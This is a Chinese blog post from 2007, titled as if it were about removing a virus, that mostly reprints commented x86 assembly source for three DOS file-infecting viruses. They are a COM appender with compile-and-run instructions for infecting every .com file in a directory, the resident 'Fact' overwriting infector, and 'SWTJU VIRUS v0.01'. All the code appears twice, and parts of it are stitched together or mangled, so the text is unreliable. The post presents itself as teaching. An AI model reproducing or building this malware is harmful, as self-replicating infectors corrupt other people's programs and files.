彻底消灭“欢乐时光”
台湾NO.1 WOR
0
2007/01/10 
10:30 
872
这个病毒恐怕是世界上最简单的病毒了,它只会感染,不会有破坏动作。本文对病毒的每一部分给出了详细的注释。不要说你看不懂哦。^_^
VirusLength equ VirusEnd-VirusStart
codeseg segment
assume cs:codeseg,ds:codeseg,ss:codeseg
org 100h
main proc near
InfectedCode db "M"
db 3 dup(90h)
VirusStart:
call WhereIAm
WhereIAm:
pop si
;si指向pop si的首地址now
mov bp,si
add si,Original4Bytes-WhereIAm
;si指向Original4Bytes的首地址now
mov di,100h
movsw
movsw
;恢复原来的文件头4个字节,以执行完病毒体后返回时正常执行原程序
mov si,bp
;si指向pop si的首地址now
mov ah,4eh
Look4NextTarget:
mov dx,offset Target-WhereIAm
add dx,si
mov cx,0
int 21h
;查找第一个com文件
jc error
mov ax,3d02h
mov dx,9eh
int 21h
jc error
xchg ax,bx
mov ah,3fh
mov dx,si
add dx,Original4Bytes-WhereIAm
mov cx,4
int 21h
;保留原com文件前4个字节
mov al,'M'
cmp ds:[si+Original4Bytes-WhereIAm],al
jz SickOrExe
;已感染或是exe文件
mov ax,4202h
xor cx,cx
xor dx,dx
int 21h
;移动指针到文件尾
mov di,offset FourNewBytes-WhereIAm
add di,2
add di,si
;di指向0,0的第一个0
sub ax,4
;恐怕最难明白就是这里了
;病毒把'M' e9写进文件头两个字节里后
;e9 wx yz被翻译为 jmp near $+2+yzwx
;ax此时为文件长度,从而
;文件头两条指令为
;dec bp
;jmp near (文件尾)
mov ds:[di],ax
add si,VirusStart-WhereIAm
;si指向VirusStart
mov ah,40h
mov dx,si
mov cx,VirusLength
int 21h
;写病毒体进文件
mov si,bp
;si指向pop si的首地址now(即WhereIAm)
jc error
mov ax,4200h
xor cx,cx
xor dx,dx
int 21h
;移动文件指针到文件头
mov ah,40h
mov cx,4
mov dx,si
add dx,FourNewBytes-WhereIAm
int 21h
;使文件执行时先跳到文件尾的病毒体执行
jc error
mov ah,3eh
int 21h
;关闭文件,感染完成
SickOrExe:
mov ah,4fh
jmp Look4NextTarget
error:
mov ax,100h
push ax
ret
;文件头四个字节已经恢复,可以正常执行原程序了
main endp
Original4Bytes:
ret
db 3 dup(?)
;病毒初次运行时,若没找到com文件,就会
;执行ret到psp段首
Target db "*.com",0
FourNewBytes db 'M',0e9h,0,0
VirusEnd equ $
codeseg ends
end main
使用说明:
用Masm或Tasm编译,然后用Exe2Com转换为com文件,运行即可感染当前目录下的所有com文件。
[Fact]
Fact is a 45 bytes overwriting resident COM/EXE infector. Infects files at
load and/or execute program by overwriting the infected file.
Compile Fact with Turbo Assembler v 4.0 by typing: TASM /M FACT.ASM
TLINK /t /x FACT.OBJ*.model tiny.code org 100hcode_begin:
mov ax,3521h ; Get interrupt vector 21h int 21h
mov word ptr [int21_addr],bx
mov word ptr [Int21_addr+02h],es
mov ah,25h ; Set interrupt vector 21h
lea dx,int21_virus ; DX = offset of int21_virus
int 21h
xchg ax,dx ; DX = number of bytes to keep res...
int 27h ; Terminate and stay resident!
int21_virus proc near ; Interrupt 21h of Fact
cmp ah,4bh ; Load and/or execute program?
jne int21_exit ; Not equal? Jump to int21_exit
mov ax,3d01h ; Open file (write) int 21h
xchg ax,bx ; BX = file handle
push cs ; Save CS at stack
pop ds ; Load DS from stack (CS)
mov ah,40h ; Write to file
mov cx,(code_end-code_begin)
lea dx,code_begin ; DX = offset of code_beginint21_exit:
db 0eah ; JMP imm32 (opcode 0eah)code_end:
int21_addr dd ? ; Address of interrupt 21h
virus_name db '[Fact]' ; Name of the virus endp
end code_begin --SPo0ky
;本病毒并无实质的破坏作用,仅供
;同仁理解Virus原理
;
;病毒源程序
code segment
ASSUME CS:CODE ,DS:CODE
VIRUS:MOV AX,CS
MOV DS,AX
MOV ES,AX
DB 0BBH
GROW DW 0H
LEA SI,BUFFER0[BX]
MOV DI,100H
MOV CX,3
REP MOVSB
MOV AH,1AH
LEA DX,DIR_BUFF[BX]
INT 21H
MOV AH,4EH
MOV CX,20H
LEA DX,SCH_STR[BX]
INT 21H
JC FAIL0
LEA DI,DIR_BUFF[BX]
MOV CX,8
INC DI
MOV AL,3FH
REP STOSB
MOV AH,4FH
INT 21H
FAIL0:JC FAIL1
LEA DI,SCH_STR[BX]
LEA SI,FILE_NAME[BX]
CLD
MOV CX,13
REP MOVSB
MOV AH,3DH
MOV AL,2
LEA DX,FILE_NAME[BX]
INT 21H
FAIL1:JNC FAIL3
JMP FAIL2
FAIL3:MOV FHANDLE[BX],AX
MOV AH,42H
MOV AL,0
PUSH BX
MOV BX,FHANDLE[BX]
MOV CX,0
MOV DX,0
INT 21H
POP BX
MOV AH,3FH
PUSH BX
LEA DX,BUFFER0[BX]
MOV BX,FHANDLE[BX]
MOV CX,3
INT 21H
POP BX
MOV AH,42H
MOV AL,2
PUSH BX
MOV BX,FHANDLE[BX]
MOV CX,0
MOV DX,0
INT 21H
POP BX
SUB AX,3
MOV BUFFER2[BX],AX
ADD AX,103H
MOV GROW[BX],AX
MOV DX,FILE_LENGTH[BX]
ADD AX,DX
JC FAIL2
MOV AH,BUFFER0[BX]
CMP AH,0E9H
JNZ WRITE
MOV AX,BUFFER2[BX]
SUB AX,BUFFER3[BX]
CMP AX,FILE_LENGTH[BX]
JZ CLOSE
WRITE:MOV AH,40H
MOV DX,BX
PUSH BX
MOV DX,BX
MOV CX,FILE_LENGTH[BX]
MOV BX,FHANDLE[BX]
INT 21H
POP BX
MOV AH,42H
MOV AL,0
PUSH BX
MOV BX,FHANDLE[BX]
MOV CX,0
MOV DX,0
INT 21H
POP BX
MOV AH,40H
LEA DX,BUFFER1[BX]
PUSH BX
MOV BX,FHANDLE[BX]
MOV CX,3
INT 21H
POP BX
CLOSE: MOV AH,3EH
PUSH BX
MOV BX,FHANDLE[BX]
INT 21H
POP BX
MOV AH,2CH
INT 21H
AND AH,02H
;JZ FAIL2
CALL SHOW
PUSH CS
MOV AX,100H
PUSH AX
XOR AX,AX
RETF
;JMP SHORT 100
FAIL2: LEA AX,BACK[BX]
SUB AX,0FEH
NOT AX
INC AX
MOV BACK[BX],AX
MOV AH,4CH
INT 21H
DB 0E9H
BACK DW 0FFEBH
SHOW:MOV AX,2
INT 10H
MOV AH,9
LEA DX,STRING[BX]
INT 21H
RET
STRING DB 0AH,0AH,0AH,0DH
DB 'SWTJU VIRUS v0.01 '
VirusLength equ VirusEnd-VirusStart
codeseg segment
assume cs:codeseg,ds:codeseg,ss:codeseg
org 100h
main proc near
InfectedCode db "M"
db 3 dup(90h)
VirusStart:
call WhereIAm
WhereIAm:
pop si
;si指向pop si的首地址now
mov bp,si
add si,Original4Bytes-WhereIAm
;si指向Original4Bytes的首地址now
mov di,100h
movsw
movsw
;恢复原来的文件头4个字节,以执行完病毒体后返回时正常执行原程序
mov si,bp
;si指向pop si的首地址now
mov ah,4eh
Look4NextTarget:
mov dx,offset Target-WhereIAm
add dx,si
mov cx,0
int 21h
;查找第一个com文件
jc error
mov ax,3d02h
mov dx,9eh
int 21h
jc error
xchg ax,bx
mov ah,3fh
mov dx,si
add dx,Original4Bytes-WhereIAm
mov cx,4
int 21h
;保留原com文件前4个字节
mov al,'M'
cmp ds:[si+Original4Bytes-WhereIAm],al
jz SickOrExe
;已感染或是exe文件
mov ax,4202h
xor cx,cx
xor dx,dx
int 21h
;移动指针到文件尾
mov di,offset FourNewBytes-WhereIAm
add di,2
add di,si
;di指向0,0的第一个0
sub ax,4
;恐怕最难明白就是这里了
;病毒把'M' e9写进文件头两个字节里后
;e9 wx yz被翻译为 jmp near $+2+yzwx
;ax此时为文件长度,从而
;文件头两条指令为
;dec bp
;jmp near (文件尾)
mov ds:[di],ax
add si,VirusStart-WhereIAm
;si指向VirusStart
mov ah,40h
mov dx,si
mov cx,VirusLength
int 21h
;写病毒体进文件
mov si,bp
;si指向pop si的首地址now(即WhereIAm)
jc error
mov ax,4200h
xor cx,cx
xor dx,dx
int 21h
;移动文件指针到文件头
mov ah,40h
mov cx,4
mov dx,si
add dx,FourNewBytes-WhereIAm
int 21h
;使文件执行时先跳到文件尾的病毒体执行
jc error
mov ah,3eh
int 21h
;关闭文件,感染完成
SickOrExe:
mov ah,4fh
jmp Look4NextTarget
error:
mov ax,100h
push ax
ret
;文件头四个字节已经恢复,可以正常执行原程序了
main endp
Original4Bytes:
ret
db 3 dup(?)
;病毒初次运行时,若没找到com文件,就会
;执行ret到psp段首
Target db "*.com",0
FourNewBytes db 'M',0e9h,0,0
VirusEnd equ $
codeseg ends
end main
使用说明:
用Masm或Tasm编译,然后用Exe2Com转换为com文件,运行即可感染当前目录下的所有com文件。
[Fact]
Fact is a 45 bytes overwriting resident COM/EXE infector. Infects files at
load and/or execute program by overwriting the infected file.
Compile Fact with Turbo Assembler v 4.0 by typing: TASM /M FACT.ASM
TLINK /t /x FACT.OBJ*.model tiny.code org 100hcode_begin:
mov ax,3521h ; Get interrupt vector 21h int 21h
mov word ptr [int21_addr],bx
mov word ptr [Int21_addr+02h],es
mov ah,25h ; Set interrupt vector 21h
lea dx,int21_virus ; DX = offset of int21_virus
int 21h
xchg ax,dx ; DX = number of bytes to keep res...
int 27h ; Terminate and stay resident!
int21_virus proc near ; Interrupt 21h of Fact
cmp ah,4bh ; Load and/or execute program?
jne int21_exit ; Not equal? Jump to int21_exit
mov ax,3d01h ; Open file (write) int 21h
xchg ax,bx ; BX = file handle
push cs ; Save CS at stack
pop ds ; Load DS from stack (CS)
mov ah,40h ; Write to file
mov cx,(code_end-code_begin)
lea dx,code_begin ; DX = offset of code_beginint21_exit:
db 0eah ; JMP imm32 (opcode 0eah)code_end:
int21_addr dd ? ; Address of interrupt 21h
virus_name db '[Fact]' ; Name of the virus endp
end code_begin --SPo0ky
;本病毒并无实质的破坏作用,仅供
;同仁理解Virus原理
;
;病毒源程序
code segment
ASSUME CS:CODE ,DS:CODE
VIRUS:MOV AX,CS
MOV DS,AX
MOV ES,AX
DB 0BBH
GROW DW 0H
LEA SI,BUFFER0[BX]
MOV DI,100H
MOV CX,3
REP MOVSB
MOV AH,1AH
LEA DX,DIR_BUFF[BX]
INT 21H
MOV AH,4EH
MOV CX,20H
LEA DX,SCH_STR[BX]
INT 21H
JC FAIL0
LEA DI,DIR_BUFF[BX]
MOV CX,8
INC DI
MOV AL,3FH
REP STOSB
MOV AH,4FH
INT 21H
FAIL0:JC FAIL1
LEA DI,SCH_STR[BX]
LEA SI,FILE_NAME[BX]
CLD
MOV CX,13
REP MOVSB
MOV AH,3DH
MOV AL,2
LEA DX,FILE_NAME[BX]
INT 21H
FAIL1:JNC FAIL3
JMP FAIL2
FAIL3:MOV FHANDLE[BX],AX
MOV AH,42H
MOV AL,0
PUSH BX
MOV BX,FHANDLE[BX]
MOV CX,0
MOV DX,0
INT 21H
POP BX
MOV AH,3FH
PUSH BX
LEA DX,BUFFER0[BX]
MOV BX,FHANDLE[BX]
MOV CX,3
INT 21H
POP BX
MOV AH,42H
MOV AL,2
PUSH BX
MOV BX,FHANDLE[BX]
MOV CX,0
MOV DX,0
INT 21H
POP BX
SUB AX,3
MOV BUFFER2[BX],AX
ADD AX,103H
MOV GROW[BX],AX
MOV DX,FILE_LENGTH[BX]
ADD AX,DX
JC FAIL2
MOV AH,BUFFER0[BX]
CMP AH,0E9H
JNZ WRITE
MOV AX,BUFFER2[BX]
SUB AX,BUFFER3[BX]
CMP AX,FILE_LENGTH[BX]
JZ CLOSE
WRITE:MOV AH,40H
MOV DX,BX
PUSH BX
MOV DX,BX
MOV CX,FILE_LENGTH[BX]
MOV BX,FHANDLE[BX]
INT 21H
POP BX
MOV AH,42H
MOV AL,0
PUSH BX
MOV BX,FHANDLE[BX]
MOV CX,0
MOV DX,0
INT 21H
POP BX
MOV AH,40H
LEA DX,BUFFER1[BX]
PUSH BX
MOV BX,FHANDLE[BX]
MOV CX,3
INT 21H
POP BX
CLOSE: MOV AH,3EH
PUSH BX
MOV BX,FHANDLE[BX]
INT 21H
POP BX
MOV AH,2CH
INT 21H
AND AH,02H
;JZ FAIL2
CALL SHOW
PUSH CS
MOV AX,100H
PUSH AX
XOR AX,AX
RETF
;JMP SHORT 100
FAIL2: LEA AX,BACK[BX]
SUB AX,0FEH
NOT AX
INC AX
MOV BACK[BX],AX
MOV AH,4CH
INT 21H
DB 0E9H
BACK DW 0FFEBH
SHOW:MOV AX,2
INT 10H
MOV AH,9
LEA DX,STRING[BX]
INT 21H
RET
STRING DB 0AH,0AH,0AH,0DH
DB 'SWTJU VIRUS v0.01 '
收藏本文到网摘:
.text:''):(d.getSelection?d.getSelection():'');void(keyit=window.open('http://my.poco.cn/fav/storeIt.php?t='+escape(d.title)+'&u='+escape(d.location.href)+'&c='+escape(t)+'&img=http://www.h-strong.com/blog/logo.gif','keyit','scrollbars=no,width=475,height=575,left=50,top=50status=no,resizable=yes'));keyit.focus();){kind=logo}
